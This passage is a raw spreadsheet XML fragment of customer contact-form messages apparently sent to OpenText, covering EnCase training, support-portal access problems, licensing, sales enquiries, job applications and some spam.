    <t xml:space="preserve">Trying to find a week long training course for Encase.  Looking for an intro for beginners course on how to use Encase for digital forensics. </t>
  </si>
  <si>
    <t>I need to unenroll from Course Name: DF210 - Building an Investigation with EnCase _x000D_
(Virtual Session) Feb. 12, 2019</t>
  </si>
  <si>
    <t>We are looking to automate our AP Invoicing process.</t>
  </si>
  <si>
    <t>Unable to access MySupport -- always goes to screen saying "No Access" and that I need to confirm my email, which I have done repeatedly...</t>
  </si>
  <si>
    <t>Want to get more information about Content Suite, particularly related to Document Management. We're beginning a product evaluation process.</t>
  </si>
  <si>
    <t xml:space="preserve">Screening the market to find the best matching our needs solution for Invoice receipt and booking automation </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Greeting of the day._x000D_
_x000D_
I had been through your website and understand that your participating at “RSA Conference”, San Francisco._x000D_
_x000D_
Would you be interested in the newly sourced “Security, Cyber security  &amp; Cryptography Professionals Users  list“. From the below mentioned industries for your upcoming sales and marketing initiatives._x000D_
_x000D_
Please let me know your target audience in order to get back to you with counts, pricing and sample information._x000D_
_x000D_
Target Industry-_x000D_
Target Geography-_x000D_
Target Job title-_x000D_
_x000D_
Awaiting for your response._x000D_
_x000D_
Regards,_x000D_
Ashley Thompson | Business development Coordinator_x000D_
_x000D_
_x000D_
Email List| Appending Services| Email Verification &amp; Validation| Company Profiling Services| Data Licensing Solutions| Database Management| Multichannel Prospect Lists| Social Validation| Hard Bounce Management| Custom Wish Lists</t>
  </si>
  <si>
    <t>I need assistance with our licensing as Support is unable to answer my questions properly.  I will attempt to paste in email info but if this form doesn't accept it then I can forward you the emails once you contact me.  My questions were not fully answered and we clearly have some issues with what our current licensing is vs. what we need.  I will need a quote if additional costs are involved to get us to where we need with the 3 physical dongles and 1 Encase Enterprise license.  Thank you._x000D_
===================================================_x000D_
Hello Andre,_x000D_
_x000D_
1) G3002085353- For upgrades you will have to check with Sales and they can make changes to it._x000D_
2) G2002050557 - This has processor only so it works for the same._x000D_
3) V828009049U  This has Encase Forensic V7_x000D_
4) X100008004548  and G2002050558 are  pretty much active._x000D_
_x000D_
_x000D_
For any new dongles, upgrades, cost you are paying  you will have to check with your Sales executive from Opentext and they should be able to help you with it._x000D_
_x000D_
_x000D_
Regards,_x000D_
Bhageerath Gudur_x000D_
OpenText Support Team_x000D_
_x000D_
&gt;Original Message_x000D_
From: andre.champagne@state.mn.us_x000D_
Sent: 12/03/2018 17:23:18_x000D_
To: support@opentext.com_x000D_
Subject: RE: OTCS Ticket 4021925 : License Questions_x000D_
_x000D_
Ok, I have a few follow-up  questions / comments_x000D_
_x000D_
1.       We have 3 physical dongles currently_x000D_
a.       Ending in "5353" - This works for Encase 8.07 but will not work when upgrading to 8.08_x000D_
b.       Ending in "0557" - This only works as a processor_x000D_
c.       Ending in "9049" - This only works with Encase 7_x000D_
2.       We supposedly have a software license only for Encase Enterprise but we don't have any documentation on what this is and we believe the machine that had it installed is one that recently died._x000D_
3.       We don't appear to have any record of G2002050558 (or can't find it)_x000D_
4.       We don't appear to have any record of X100008004548 or know what this is_x000D_
_x000D_
_x000D_
Here is what we ultimately need, please tell us if we need to upgrade anything or if you can s</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are interested in knowing more about Adobe DAM and if possible run a product Demo with our Corporate Communications and Digital Marketing Teams,_x000D_
just as background, CEMEX is one of the top cement companies in the world with more than 40K employees in 50 countries and revenue of 13 billion USD_x000D_
our team has been tasked to evolve the current application and we are thinking about implementing a robust DAM that can serve to the corporate communications and marketing team_x000D_
_x000D_
please let me know when we can have a brief talk to explain better_x000D_
_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>Hello.  Conavi Medical is a medical device company that is looking into its options to implement electronic document control throughout the organization.  I learned a little bit about the Documentum platform for life science companies and would like to learn more.</t>
  </si>
  <si>
    <t>I have a user here at Windsong that is trying to send faxes out and is receiving the following error: "problem converting fax body or cover sheet"_x000D_
I have tested the numbers she is faxing to and they are all giving me a tone. I watched her work flow and found she was attaching a .TIFF file and a .PDF file. I had her centralize the files into .PDF files and try again. RightFax is still showing the same error. Please advise._x000D_
_x000D_
Thank you,_x000D_
Kyle</t>
  </si>
  <si>
    <t>Job seeker</t>
  </si>
  <si>
    <t>To Know the Requirements</t>
  </si>
  <si>
    <t>Hi all, we are not able to open support tickets. Could you kindly check why we cannot do?_x000D_
I already make the email opt-in check approval.</t>
  </si>
  <si>
    <t>I have tried to log in to our catalog in Open Text. But when I click log in, nothing happens.  I tried to reset the password. Once the password was reset I tried to log in again but it continued to do nothing.  There were no messages about any errors.</t>
  </si>
  <si>
    <t xml:space="preserve">Don Le not responsive, would like to talk to a new sales rep.  </t>
  </si>
  <si>
    <t>My login does not give me access to any of the OCC support pages/downloads.</t>
  </si>
  <si>
    <t>We are a start-up biotech that is seeking a HIPAA compliant eFax. Your company was referred to us as we are looking for options and pricing during our evaluation process. Please have someone contact me to discuss what OpenText can provide.</t>
  </si>
  <si>
    <t>I am attempting to locate the EnCase 8.08 software to download. I try to connect to the Support section but requires me to send a verification email, and then advises that I am verified and the requires me to send a verification email again.</t>
  </si>
  <si>
    <t>Guten Tag _x000D_
Wir werden Anfangs nächstes Jahr VIM Vendor Invoice Management mit der Firma Itelligence einführen, dafür brauchen wir noch diesen Monat die Support Packages zu OTXVIM und die VIM/BC Integrationskomponenten. Können Sie uns dazu den Zugang öffnen? Besten Dank und Gruss, Jan Canonica</t>
  </si>
  <si>
    <t>Yes we are looking to replace our current Digital Asset Management system and we’re planning to send out RFIs today. What would be the address to send this to? Many thanks</t>
  </si>
  <si>
    <t>We had a very old version of Gupta Quest Reporting software that was used to create a variety of reports.  I am looking for a newer version of reporting software that can leverage the .qtt format so that all the reports do not need to be recreated from scratch</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer want to deploy e-filing system for justice to use it for evidence collecting and Criminal e-File system. Hope you have a good solution. </t>
  </si>
  <si>
    <t xml:space="preserve">Allen &amp; Overy LLP is in the process of researching Business Development, CRM and Client Feedback solution(s).  Your solution has been identified as having some or all the features that meet the requirements.  _x000D_
_x000D_
I am writing to arrange a 30 minute high level demonstration with 15 minutes Q&amp;A at the end of the session.  _x000D_
_x000D_
Please confirm a contact name and your availability on 10th/11th December._x000D_
_x000D_
Kind regards,_x000D_
Julie  _x000D_
</t>
  </si>
  <si>
    <t>We're using IRM client for PDF and receive this error when opening protected PDF's which we receive from our suppliers._x000D_
Error on Server: Initial Connection: SSL Handshake failed_x000D_
is there a connection problem on your site_x000D_
_x000D_
thanks_x000D_
Raf De Keersmaecker</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
</t>
  </si>
  <si>
    <t>Hi, I am looking for OpenText to SharePoint 2016 integration. I need help regarding this integration. Please contact me.</t>
  </si>
  <si>
    <t>Hi, hope that you can help. I need to set up some Teamsite training and wonder if you can advise what I need. I need to know the basics of how Teamsite functions for British Airways, and more importantly, how I can help the team improve on what they are creating._x000D_
Thanks in advance. _x000D_
Susanne</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam, _x000D_
_x000D_
I was wandering if it was possible for me to get more information about the different sponsor packages. What kind of sponsorship are there. Are there different sizes stand. And what are the cost that are connected to the packages. _x000D_
_x000D_
Besides the sponsor packages, i was also wondering what the prices are for a visiting ticket. _x000D_
_x000D_
I'm looking forward to your response. _x000D_
_x000D_
With kind regards, _x000D_
_x000D_
Maria van Hijfte  </t>
  </si>
  <si>
    <t>Dear team,_x000D_
Good day,.._x000D_
One of the our customer need open text brava with the feature of convert any files to PDF and TIFF._x000D_
kindly suggest the model and share the price._x000D_
_x000D_
Regards,_x000D_
Sangeetha</t>
  </si>
  <si>
    <t>I could not login to mysupport with my account reimund.haberer@mail.schwarz. I get the message "No Access We're sorry, your account does not grant you access to this resource.". Last Friday it works and I could look at our support tickets"</t>
  </si>
  <si>
    <t>We are looking for Teleform update or similar OMR software. Searching for Hummingbird we found you. Could you help us? Have you an italian reseller?_x000D_
Best regards_x000D_
Leonardo Roda</t>
  </si>
  <si>
    <t>Team, I am from the product management team and would need information on all patches released for product "eDOCS DM (Document Management)" versions 16.1, 16.2, 16.2 and 16.4.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We’re IT leads provider from Noida, India. If you are looking for Web Design, Development or SEO leads kindly get back to us and we will charge as mentioned below. _x000D_
_x000D_
Web Development $10 Per Lead_x000D_
Web Designing $10 Per Lead_x000D_
SEO $8 Per Lead_x000D_
_x000D_
Regards_x000D_
Akansha_x000D_
Email: info@eacpl.net_x000D_
WhatsAPP: +91 8130017380      </t>
  </si>
  <si>
    <t>Hello,_x000D_
PGI, as company, is dedicated to have a high level prepared professionals. Previously, while working with Documentum, all our employees where Documentum certified (First level and professional level as well). Now we want to retake this practice, but we didn't manage to find information about the certification process._x000D_
_x000D_
Could you please help us to:_x000D_
1. Identify the steps required to start the certification process._x000D_
2. Let us know where the certification is passed? Previously we were doing it in the PearsonVue Certification centers. Is this approach still valid?_x000D_
3. We have acquired a certification package (learning classes). We want now to proceed with the scheduling of the certifications, but we need to find answers to the above questions._x000D_
_x000D_
Your support is highly appreciated._x000D_
_x000D_
Regards,_x000D_
Doina.</t>
  </si>
  <si>
    <t>Dear team,_x000D_
_x000D_
Please let me know where I can buy, from U.E., one Opentex renew license._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Izabela Mihalache</t>
  </si>
  <si>
    <t>Good job</t>
  </si>
  <si>
    <t>Course 3-8010 Documentum Technical Fundamentals v7.2_x000D_
_x000D_
Dear OpenText team,_x000D_
_x000D_
some days ago I found the training "Documentum Technical foundations", Date: 03.12.2018, Course type "On-Site" with location "Virtual Classroom - South Africa" on your training website. Does this training take place, and is it an online session shared via Skype?_x000D_
If it's online shared, would it still be possible to join?_x000D_
Thanks in advance and _x000D_
kind regards,_x000D_
Thomas</t>
  </si>
  <si>
    <t>I need access to My Support Page._x000D_
What are the details I should provide for My Support access.</t>
  </si>
  <si>
    <t xml:space="preserve">With opentext VIM integration to SAP FICO, how does one process multiple invoices at once? Previously we can use sap mass upload template tcode. </t>
  </si>
  <si>
    <t>Hi, we need to speak with someone in OpenText as soon as possible regarding your eDiscovery capabilities, in support of our response to the Aged Care Royal Commission - and in particular the likely costs. For reference, you are one of several companies we have contacted. We have some background with OpenText and Recommind in the past. Thanks, Andrew Warland</t>
  </si>
  <si>
    <t>to follow me</t>
  </si>
  <si>
    <t>aaa大家一起完美起来aaa</t>
  </si>
  <si>
    <t>Translation, Localization and DTP Service Provider</t>
  </si>
  <si>
    <t>I accept the loan approval</t>
  </si>
  <si>
    <t>Dear OpenText Team, _x000D_
_x000D_
I am Eugenio Galioto, CEO @ ArtioMiX Ltd, an early-stage startup based in London and baked by Entrepreneur First._x000D_
_x000D_
Manual keywording of every video is an annoying task and affects the recommendation and the search engine. _x000D_
_x000D_
Our solution for this is a cloud platform highly specialised on HAM in order to provide a high accuracy engine (from 50% to 85%) to any DAM and cloud based media service. _x000D_
_x000D_
We would love to have a chat with you in order to explore the opportunities and to learn, but you are free to ignore this message in case it does not fit with your needs, we understand._x000D_
_x000D_
Cheers,_x000D_
Eugenio Galioto - CEO @ ArtioMiX Ltd.</t>
  </si>
  <si>
    <t>I want this</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I was wondering if you have a academic version at low or free version of Encase for use with higher education?  </t>
  </si>
  <si>
    <t xml:space="preserve">Communication </t>
  </si>
  <si>
    <t>An applicant for the safety officer / supervisor / safety engineer job</t>
  </si>
  <si>
    <t>We are no longer a Partner of Opentext. Can you please remove our company details off your website asap please._x000D_
I would appreciate confirmation by email once this has been completed._x000D_
Thank you_x000D_
Rebecca Hall</t>
  </si>
  <si>
    <t>Looking for electronic faxing solution for NextGen EHR</t>
  </si>
  <si>
    <t>I wanted to get the latest version of the RightFax Client. We currently have version 10.6. We have started deploying machines with Microsoft Office 2016 and the 10.6 version is not working that well.</t>
  </si>
  <si>
    <t xml:space="preserve">We have been looking around at CMS options for our Employer Website, and opentext CMS was one of the few that we are considering.  As such, we want to make sure that some of the security concerns that we have are addressed.  I was wondering if you could help answer these questions._x000D_
_x000D_
Authentication configuration: What authentication mechanism is used for standard user accounts &amp; for administration?  Is MFA enabled for privileged and user accounts?  Does opentext have an integration with OneLogin?_x000D_
Logging: Can we use SNMP or other polling systems to probe this system?  How has logging been enabled?_x000D_
Storage: How has encrypted storage been enabled?_x000D_
</t>
  </si>
  <si>
    <t>One of your fax machines from the following number  800-3969402 identified as Easylink and another number  732-384-2930 identified as Easylink Svcs on my Caller ID called me at the above number, my home phone,10 times in a 3 minute span earlier today. It was clearly a fax machine with its beeping tone. Please circulate whatever you need to insuring my number is removed from your Fax number list. Thanks. Tom Rodman</t>
  </si>
  <si>
    <t>I'm suffering for a job that is why I contact</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Steven Jia and I'm a 4th year engineering student at the University of Waterloo. I am contacting you today to ask if OpenText would be interested in a potential sponsorship opportunity._x000D_
_x000D_
To give some background, I am chairing the 2019 Canadian Engineering Competition at the University of Waterloo next March. As Canada's national-level engineering competition, CEC brings together some of the brightest engineering students from across Canada to test their engineering prowess. I'm sure they'd love the opportunity to chat with industry-leading software company like OpenText. Besides having access to top Canadian engineering talent for networking and recruitment, sponsors will also be afforded the opportunity to judge their work and potentially be involved in the design of the competition challenge itself. We will of course publicize OpenText's support through our social media accounts and marketing channels._x000D_
_x000D_
If you are interested in chatting about this opportunity further, I'd be happy to have a call with you. I can be reached by email or by phone. I'm looking forward to hearing back from OpenText!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Steven Jia</t>
  </si>
  <si>
    <t xml:space="preserve">Defective TX1 need replacement </t>
  </si>
  <si>
    <t>My company did an implementation in 2017 and Charles McKinney was the Sales Executive I worked with.  He is no longer with your organization and I am trying to reach out and find a new contact because our site is wanting to explore additional opportunities with your organization.  I have attempted to contact your Alpharetta, GA office with no success.</t>
  </si>
  <si>
    <t>For Interview Schedule.</t>
  </si>
  <si>
    <t>Cannot seem to access DF120 OnDemand course.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to obtain quote for both training and certification testing for EnCE (Encase Certified Examiner) for two people. Please provide quote for one person with total for two. Thanks. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Michelle. I am a massage therapist with many years of experience. My company, M is 4 Massage, offers massage services that your company can use as an employer paid benefit (like a sales or service incentive to hit company goals) or as an employee paid option (such as give your employee’s an option to buy relaxation services during break or lunch periods)._x000D_
_x000D_
We also offer mobile service for events such as customer appreciation, fundraisers, employee appreciation and holiday events. _x000D_
_x000D_
You can call 248-821-6605 or email Mis4massage@gmail.com to go over service and pricing plans. You can view pictures from previous events on our website. _x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
 Thank you, _x000D_
_x000D_
Michelle Mikha_x000D_
248-821-6605</t>
  </si>
  <si>
    <t>upgrade licensing from Exceed on Demand to Exceed TurboX for 250 users.</t>
  </si>
  <si>
    <t>Hi, I manage the it of a client that has alchemy server since 2004 more or less. Its on a w2000 server. The local company who sold it broke. We virtualized the server but its not running the alchemy server, it says there is not license, where I can find support or a reseller?_x000D_
_x000D_
best regara</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Documentum (which is now OpenText?)  Looking to save time, have users work on documents in a place that is compliant and allows for version control.  </t>
  </si>
  <si>
    <t>serial number X100008005391</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to enquire about two courses and certifications of the courses which are available online or on demand or if there is any other mode of providing training and cost per course including certification. _x000D_
_x000D_
Course names are :-_x000D_
xDB Administration _x000D_
InfoArchive Administration_x000D_
_x000D_
Thanks for prmpt response. </t>
  </si>
  <si>
    <t xml:space="preserve">call and ask </t>
  </si>
  <si>
    <t>Hi Team, my name is Praveen Kumar, Sourcing Lead with Accenture, One of our client would like to renew the existing Purchase Order, in this context, I am looking for the details of the contact person at your organization who deal with the renewals. Thanks, Praveen</t>
  </si>
  <si>
    <t xml:space="preserve">We have implemented VIM 7.5 SP 2 and Archive server 10.5  in year 2015. We want to archive invoices prior to 2018 from our archive server and retain only 2018 invoices. We need support from opentext for this._x000D_
_x000D_
Thanks ,_x000D_
Mayura </t>
  </si>
  <si>
    <t>Been emailing anna.creighton@guid.com for a quotation to renew our contract but not getting a reply</t>
  </si>
  <si>
    <t>we need to get distribution ship to sri lanka and maldives</t>
  </si>
  <si>
    <t>Please call me for a proposal</t>
  </si>
  <si>
    <t xml:space="preserve">Need to download latest update for encase forensic having Dongle Serial Number:  G3002090313 </t>
  </si>
  <si>
    <t>I changed the email address and now I can't get anywhere_x000D_
Please fix this, and these please fix your email change process</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (499) 322-46-85 , Валерий.</t>
  </si>
  <si>
    <t>looking to create a new platform and want to see if this is an option_x000D_
Thanks so much</t>
  </si>
  <si>
    <t>Hi, I'm starting a new business and like the name hummingbird. I see from your website this is your old name. Would you consider selling the domain? Thanks, Tim</t>
  </si>
  <si>
    <t>I am working with a client who has SQLBase 11.7  I have downloaded your evaluation copy to test an ODBC connection but while the 32 bit ODBC works fine, the 64 bit ODBC driver crashes every time you press "test connection"</t>
  </si>
  <si>
    <t xml:space="preserve">Bug in your webpage, your webpage will not allow anyone to login and upload a cv. Lack of flexibility </t>
  </si>
  <si>
    <t>Need information on data lifecycle archiving solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am re-building our website and wanted to link opentext as a service partner as well as post a customer story on your website. What do you think? </t>
  </si>
  <si>
    <t>I am looking to access the MySupoort to obtain the newest version EnCase 8 and certs our service contract.</t>
  </si>
  <si>
    <t>Trying to support a service request and it says I don't not have a contract.</t>
  </si>
  <si>
    <t>General Inquiry</t>
  </si>
  <si>
    <t>Looking for a solution for a client, American Society of Mechanical Engineers and would like to talk to someone.</t>
  </si>
  <si>
    <t>I am unable to access/download EnCase Forensic software from my account</t>
  </si>
  <si>
    <t>Can you please send me a quote for OpenText Brava! for Content Suite for 1 user? You can send the quote to ctodd@chiyoda-usa.com. thank you so much. Cheryl</t>
  </si>
  <si>
    <t>I am unable to access/download new versions of EnCase Forensic Software</t>
  </si>
  <si>
    <t>I work for Manor ISD.  We are implementing OpenText and I need to download the software but when I attempt to I get the No Access to this resource issue.  Our SUID is 54300-12668.  Thank you.</t>
  </si>
  <si>
    <t>Subject: HR contact for getting experience letter for my Green card processing _x000D_
I worked for Cordys from Jun 2009 to  Sep 2010. I need the experience letter in detailed format with all my roles and responsibilities from my previous employer (that is Cordys (now OpenText )for my Green card processing.  Kindly let me know the process for the same.</t>
  </si>
  <si>
    <t>I am interested in knowing more about Redact It Enterprise.  Is there a way we can get a trial of this?  I'm also interested in a ballpark figure out how much it costs._x000D_
_x000D_
Thanks,_x000D_
-Drew</t>
  </si>
  <si>
    <t>We're a old Documentum and e-Rooms user.  We are needing to buy additional e-Rooms licenses.  We dropped support for the platforms after 2017 and have never dealt with OpenText since they acquired the products.  If you could email me contact information to get started it would be great.  I can then give you the information on what we have.</t>
  </si>
  <si>
    <t>Interested in automated AP invoice imaging/indexing solution for Oracle EBS R12x.  Please email me.</t>
  </si>
  <si>
    <t>Just following up on a recent phone call i had with OpenText. I cannot recall the gentleman's name, but we spoke about Ace Hardware's need for a CMS Demo the week of Dec. 2. I was told a follow up call / email would be sent to me in re guards to confirmed day / time for a Demo at Ace. Could I please get an update on this? Thanks</t>
  </si>
  <si>
    <t>I would like you to forward me your form for updating our VISA credit card info.  Our card was hacked/comprised manny many months ago and a new card number was issued by our bank.  I forwarded the new information to your firm last August 24, 2018 to uktwebsupport@gxs.com and I copied Madelle Urdelas@gxs.co &amp; Jamila Ahkafuddin@gxs.com._x000D_
_x000D_
Hence, I thought everything was taken care of.  Apparently not, because I received an email today saying that we owed money for many past due invoices.  I have had it with you people.  I have to do everything over and over until it finally gets done.  Go look up my e-mail if you want to get paid._x000D_
Disgusted Customer - Gene DeFouw</t>
  </si>
  <si>
    <t>Second Attempt!_x000D_
Do you have a partner program?  We are an IBM Power MSP - may have some opportunities that we can partner on._x000D_
_x000D_
Please Advise.</t>
  </si>
  <si>
    <t>We have been retained by an LNG company to select several software solutions including document management. We would like to schedule a sales demo for the company sometime over the next couple of weeks. Please contact me on my cell at 832-722-8097.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you’re doing great._x000D_
_x000D_
Reaching you out to check if you would be interested in the newly Sourced “Big Data and Connected Data Platforms Users Database” with all the emails and contact information’s._x000D_
_x000D_
Get in touch with the users database mentioned below._x000D_
•	IBM Users _x000D_
•	HP Enterprise Users_x000D_
•	Teradata Users_x000D_
•	Oracle Users_x000D_
•	SAP Users_x000D_
•	EMC Users_x000D_
•	Amazon Users_x000D_
•	Microsoft Users_x000D_
•	Google Users_x000D_
•	VMware Users_x000D_
•	Splunk Users_x000D_
•	Alteryx Users_x000D_
•	Cogito Users Across USA, UK, Canada, Australia, Asia and other Countries._x000D_
_x000D_
Let me know your targeted users in order to get back to you with Users records, Pricing and few samples for your review._x000D_
_x000D_
Target User-_x000D_
Target Geography-_x000D_
Target Job title-_x000D_
_x000D_
Awaiting for your response._x000D_
_x000D_
Thanks,_x000D_
Jannine Weigel| Business development Coordinator _x000D_
_x000D_
Email List| Appending Services| Email Verification &amp; Validation| Company Profiling Services| Data Licensing Solutions| Database Management| Multichannel Prospect Lists| Social Validation| Master B2B Database Files| Hard Bounce Management| Custom Wish Lists</t>
  </si>
  <si>
    <t>NEED TO LOOK AT THIS SOLUTION TO SEE IF IT FIT OUR NEEDS</t>
  </si>
  <si>
    <t>Looking for a solution to generate, produce and manage pdf forms from OTCM.</t>
  </si>
  <si>
    <t>Hello, my company is required to be Prop 65 compliant. Could you advise how to go about this? the initial email states this needs to be done by 11/30.</t>
  </si>
  <si>
    <t>Buy</t>
  </si>
  <si>
    <t>Looking for an ECM solution</t>
  </si>
  <si>
    <t>HELP!!!! I have registered for a Learning Services training course (DF210) and it's not showing up in the "My Training" section of my account. I only see an old course that I have already completed. My boss expects me to have this started ASAP. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Nixu AB have bought the Company BitSec AB that have a EnCase Version 8.05 _x000D_
We would know like to upgrade this to the latest version. _x000D_
Dongel ID V851211808_x000D_
Order nr 626272_x000D_
How can this be done and how fast can it be done? _x000D_
_x000D_
Br Mats _x000D_
</t>
  </si>
  <si>
    <t>Need a quote on ENCASE</t>
  </si>
  <si>
    <t>How do I get into 5.15?</t>
  </si>
  <si>
    <t>Hi - I want to make sure, that my application for the Account Executive has been received? I applied two weeks ago - never got a receipt and trying to log in to the webportal gives me the text "e-mail has been restricted"... _x000D_
Look forward to your reply._x000D_
BR_x000D_
Folke</t>
  </si>
  <si>
    <t>To understand and seek partnerships on EDI deployments, SINCE EDI has become one of our key integration rules</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
We are interested in getting more information about your products._x000D_
Could you provide me with email contact to Sales department?_x000D_
_x000D_
Thank you in advance._x000D_
Kind regards,_x000D_
Anna Krzyszkowska_x000D_
Procurement Sourcing Mkt&amp;S_x000D_
Philip Morris International_x000D_
</t>
  </si>
  <si>
    <t>Ich bin Nutzer von EnCase Forensic 8 und möchte das EnCase-Forum besuchen sowie Updates laden. Die bisher genutzten Loginseiten von Guidance Software funktionieren nicht mehr. Bitte senden sie mir einen entsprechenden Link für den Zugang zur "Customer Community".</t>
  </si>
  <si>
    <t xml:space="preserve">Madam, Sir,_x000D_
Bredin Prat is a French business law firm thinking of buying a permanent on-site solution to meet its internal forensic needs. _x000D_
Our need is to get an on-site solution to deal with clients’ matters which are:_x000D_
-	Higlhy confidential, and the data cannot be transfered to an external service provider (even if highly secured and submitted to privilege)_x000D_
-	Too small to require an agreement with an external service provider_x000D_
-	Very urgent, and requiring to analyse the data on site as quickly as possible_x000D_
_x000D_
We would use such on-site solution when necessary in order to protect privilege and confidentiality, but if the data are too heavy or if they need to be handled (extracted, restored) we would use our usual service providers._x000D_
I need to choose the best solution at the best price. As a consequence, I would be grateful if you could please submit an estimate for an on-site solution fulfilling the following criteria (please specify if the criteria are not relevant for you):_x000D_
-	Object: search information into huge amount of data (ex. .pst items, usb key containing thousands of documents, etc.), without the need to extract the data (we consider that we will get raw data already extracted), in order to:_x000D_
o	Process the data (i.e. to sort the emails by subject/date/size, or to extract emails with attachments, etc.)_x000D_
o	Search the data (i.e. to OCR a pdf, to erase doublons, etc.)_x000D_
o	Add predictive coding/artificial intelligence (i.e. to analyze the content of the documents and make connections, to make stories with documents, to calculate figures on the data, etc.)_x000D_
-	Data: average 100GO/month to be uploaded on the platform. We would work on each set of data for one year in average._x000D_
-	Place: on site solution (Paris, France)_x000D_
-	Users: accessible for at least 4 associates simultaneously_x000D_
Please provide the following information:_x000D_
-	Time: how many GB is it possible to upload/process in 1 hour?_x000D_
-	Language: in how many languages is the translation available?_x000D_
-	Technical </t>
  </si>
  <si>
    <t>Consent for reproduction of white paper in Efficient Manufacturing magazine</t>
  </si>
  <si>
    <t>document capture &amp; management</t>
  </si>
  <si>
    <t>Acees to KC  to download documents and products</t>
  </si>
  <si>
    <t xml:space="preserve">Demande de rendez-vous pour la GED </t>
  </si>
  <si>
    <t xml:space="preserve">Hi team,_x000D_
Please let me know where I can purchase, in Romania or UE, one Opentext renew license._x000D_
We will resell this to our client._x000D_
Thank you,_x000D_
Izabela Mihalache_x000D_
</t>
  </si>
  <si>
    <t>Concerns about encase</t>
  </si>
  <si>
    <t>Concerns about encase.</t>
  </si>
  <si>
    <t>I need to cancel my electronic fax subscription please. I left a voicemail this morning.  I got charged $44.95 for a service (I didn't know I still had the service). thanks</t>
  </si>
  <si>
    <t>I have not been successful in trying to access the knowledge center._x000D_
I'm stuck in a loop where your website asks me to verify my account but I still get the same error after I validate my email. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We are upgrading to windows 10 and need to know what versions of Alchemy are compatible with the software </t>
  </si>
  <si>
    <t xml:space="preserve">Hzbzvzvuvvsuviehuriiiejiwrwda vjsjioeehu bshueiooenk bvabzje.mzbyej,hheudhjwjinwbbxunwoijjeyvvsybiehiehus hbsjue behdjeb </t>
  </si>
  <si>
    <t>Unable to access My Support -- keeps trying to validate my email, which I have done.  When trying to install Teleform on a new server, it is only installing Teleform Monitor -- not Reader, Verifier, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">I have tried contacting my representative but have not received a return call or email.  I would like to receive a quote for 25 Imaging for Windows 4.0 licenses.  My last Account Manager was Israel Orais but it's been a while since I spoke to him.  </t>
  </si>
  <si>
    <t>Upgraded our cucm system and having issues with our right fax application. Contacted support and our contract needs to be renewed. Looking to setup asap.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a communications tool to track all of our correspondences (email) to our internal UX Researchers and external UX participants. We need a tool that will allow us to assign and reassign projects easily and allow managers to see all communications. </t>
  </si>
  <si>
    <t>need short term version of your software for article they want</t>
  </si>
  <si>
    <t>Inquiring about rates for a private course and for instructors to come to our location.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We would like to schedule a demo and discuss about FAX2MAIL software._x000D_
_x000D_
Thanks_x000D_
_x000D_
Josh</t>
  </si>
  <si>
    <t>Comprar licencia, Demo</t>
  </si>
  <si>
    <t>Looking for Technical Admin for GCdocs Government of Canada Gold build. Loading folder structures, groups and permissions management, tech support, building workflows etc.</t>
  </si>
  <si>
    <t>I need to create a support account.  The individuals with access, Lee Winters and Pete Trerice, have left the company.</t>
  </si>
  <si>
    <t>request quote for secure fax</t>
  </si>
  <si>
    <t>I have been on indeed applying for jobs.I received an email from a job recruiter on behalf of Open Text.  I knew immediately they were not who they say they were as they were asking for personal information along with my resume. Thought the company should be aware.</t>
  </si>
  <si>
    <t>In past years there has been an enfuse conference held in Las Vegas, my company has beun asking me about it in order to get the financials budgeted and approved. Was wondering if the conference is still going to be held and, if so, are there any other details that can be provided? _x000D_
Thank you much.</t>
  </si>
  <si>
    <t>Hello there,_x000D_
_x000D_
I am reaching out again to find out more about your OCR product solution and capabilities._x000D_
Infor is evaluating OCR products in the market place and would like to know more about your OCR solution._x000D_
_x000D_
I would be happy to connect over email and provide more details. _x000D_
Looking forward to hear back._x000D_
_x000D_
Shailesh Barve</t>
  </si>
  <si>
    <t>Good evening,_x000D_
we already running Opentext Faxserver v.10.6, I would to know if there is a list of maintainers in Italy avaiable to help us to maintain and upgrade the solution. We ask for remote support, physical presence is not required._x000D_
In other EU country is also accepted, English speaking is mandatory._x000D_
_x000D_
Best Regards_x000D_
Gianmarco</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm trying to download the latest version of Enterprise Scan (16.4) but I cannot find it available under the Downloads section. Can you please assist?_x000D_
_x000D_
Thank you,_x000D_
Regards,_x000D_
_x000D_
Rui Loureiro</t>
  </si>
  <si>
    <t>Inquiry - I am researching solutions for document/evidence inventory with cross team collaboration and versioning control.  Do you have a white paper or any information you can send me, along with a general pricing list?    Thank you.</t>
  </si>
  <si>
    <t>Hello_x000D_
we are a phone repair shop_x000D_
we are interested in your data recovery software from the android and ios devices_x000D_
thank you</t>
  </si>
  <si>
    <t>Hi - we have Xerox MFPs 5865 and 5955 and want to discuss using OpenText-Fax2email.  We need to know what's required on the Xerox end?</t>
  </si>
  <si>
    <t>Hello, We need to upgrade our SQLBase version 11.x version. How much it cost? Can we have littebit more information. T: Matti</t>
  </si>
  <si>
    <t xml:space="preserve">Hej, _x000D_
_x000D_
